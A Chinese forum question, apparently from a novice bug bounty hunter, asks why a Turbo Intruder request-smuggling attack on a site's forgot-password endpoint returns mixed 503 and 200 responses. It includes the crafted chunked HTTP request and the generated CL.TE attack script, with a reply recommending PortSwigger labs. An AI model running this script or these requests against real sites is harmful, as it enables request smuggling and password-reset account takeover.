使用 Turbo Intruder 时出现奇怪的反应

问题描述 投票:0回答:1

我是一名漏洞赏金猎人,而且刚刚接触它。几天前,我读到了“请求走私”漏洞。就在那之后,我开始在互联网上查找它。昨天,我发现一个网站,当我将 X-Forwarded-Host: google.com 添加到标题时,它会将我重定向到 

https://www.google.com
。利用这一点非常困难,所以我考虑将其与请求走私结合起来。我选择更改密码请求作为目标: POST /my-rx/forgot-password HTTP/1.1 Host: www.example.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://www.example.com/ Content-Type: application/x-www-form-urlencoded Content-Length: 112 Connection: close Cookie: <my_cookie> Upgrade-Insecure-Requests: 1 email=mymail%40gmail.com&submit=Reset+My+Password&csrf_token=cb5a82b3df1e45c7b95d25edb46cfbf3 

我将其转换为分块:

POST /my-rx/forgot-password HTTP/1.1 Host: www.example.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://www.example.com/ Content-Type: application/x-www-form-urlencoded Content-Length: 112 Connection: close Cookie: <my_cookie> Upgrade-Insecure-Requests: 1 Transfer-Encoding: chunked 6b email=mymail%40gmail.com&submit=Reset+My+Password&csrf_token=cb5a82b3df1e45c7b95d25edb46cfbf3 0 

但是当我发送它时,它给了我
503 client read error

代码。看起来它不接受

chunked
。但是,我仍然想继续,所以我在 Burp Suite 上下载了 HTTP Request SmugglerTurbo Intruder 扩展。然后我进行走私攻击(CL.TE)。它给出了走私攻击的Python代码: # if you edit this file, ensure you keep the line endings as CRLF or you'll have a bad time def queueRequests(target, wordlists): # to use Burp's HTTP stack for upstream proxy rules etc, use engine=Engine.BURP engine = RequestEngine(endpoint=target.endpoint, concurrentConnections=5, requestsPerConnection=1, resumeSSL=False, timeout=10, pipeline=False, maxRetriesPerRequest=0, engine=Engine.THREADED, ) # This will prefix the victim's request. Edit it to achieve the desired effect. prefix = '''GET /hopefully404 HTTP/1.1 X-Ignore: X''' # The request engine will auto-fix the content-length for us attack = target.req + prefix engine.queue(attack) victim = target.req for i in range(14): engine.queue(victim) time.sleep(0.05) def handleResponse(req, interesting): table.add(req) 

然后我使用
Turbo Intruder

运行它。我很惊讶,它发送了 14 个请求,但只有 12 个请求是503,剩下 2 个是

200
。特别的是,在 
200
响应头中,它有 
...transfer-encoding: chunked...
。我尝试了几次,结果都是一样:1 或 2 个请求是
200
。但这里有些奇怪,在代码中,它是
...prefix = '''GET /hopefully404 HTTP/1.1
X-Ignore: X'''...
。经过几次测试,我认为这不是请求走私错误,因为响应显示它是原始请求的响应,而不是代码中的
prefix
(我也尝试过更改
prefix
,但它仍然是
200
,不是 
400
404
,...如我所料)。
那么有没有人(必须是非常专业的黑客)知道我面临什么漏洞?谢谢!

security request burp
1个回答
1
投票
TE;CL

中分块,但在使用 burp 扩展后,您发现它的 

CL;TE
,所以问题可能就在那里。 与您的回答一样,您有点困惑,我建议您解决 portswigger http 请求走私实验室,因为我最近已经完成了该实验室,通过它您的基础知识将变得非常强大!

最新问题
© www.soinside.com 2019 - 2024. All rights reserved.